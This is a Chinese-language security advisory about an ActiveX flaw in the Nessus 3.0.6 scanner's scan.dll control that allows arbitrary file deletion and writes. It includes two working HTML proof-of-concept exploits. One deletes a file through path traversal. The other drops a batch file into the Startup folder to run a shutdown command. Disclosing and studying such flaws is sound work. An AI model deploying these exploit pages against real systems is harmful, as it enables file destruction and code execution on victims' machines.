Nessus SCANCTRL.ScanCtrlCtrl.1 ActiveX控件任意文件删除漏洞
发布日期:2007-07-26
更新日期:2007-07-30
受影响系统:Nessus Nessus 3.0.6
描述:
BUGTRAQ ID:
25088
Nessus是一款流行的漏洞扫描程序。
Nessus扫描器的SCANCTRL.ScanCtrlCtrl.1(scan.dll)ActiveX控件,远程攻击者可能利用此漏洞删除系统上的任意文件。
SCANCTRL.ScanCtrlCtrl.1(scan.dll)ActiveX控件包含有不安全的deleteReport()、deleteNessusRC()和saveNessusRC()方式,允许攻击者删除或保存参数所指定的任意文件。
<*来源:Krystian Kloskowski (
h07@interia.pl)
链接:
http://secunia.com/advisories/26243/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<HTML>
<!--
Nessus Vulnerability Scanner 3.0.6 ActiveX deleteReport() 0day Remote Delete File Exploit
Bug discovered by Krystian Kloskowski (h07) <
h07@interia.pl>
Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
Just for fun ;]
-->
<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>
<script language="javascript">
obj.deleteReport("../../../../../../../test.txt"); //Deleting file: C:\test.txt
alert("done");
</script>
</HTML>
<HTML>
<!--
Nessus Vulnerability Scanner 3.0.6 ActiveX 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <
h07@interia.pl>
Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
Just for fun ;]
-->
<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>
<script language="javascript">
obj.addsetConfig('shutdown -t 1000 -s -c "hello world ;]" && pause', '', '');
obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
</script>
</HTML>
建议:
厂商补丁:
Nessus
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.nessus.org浏览次数:3746
严重程度:0(网友投票)
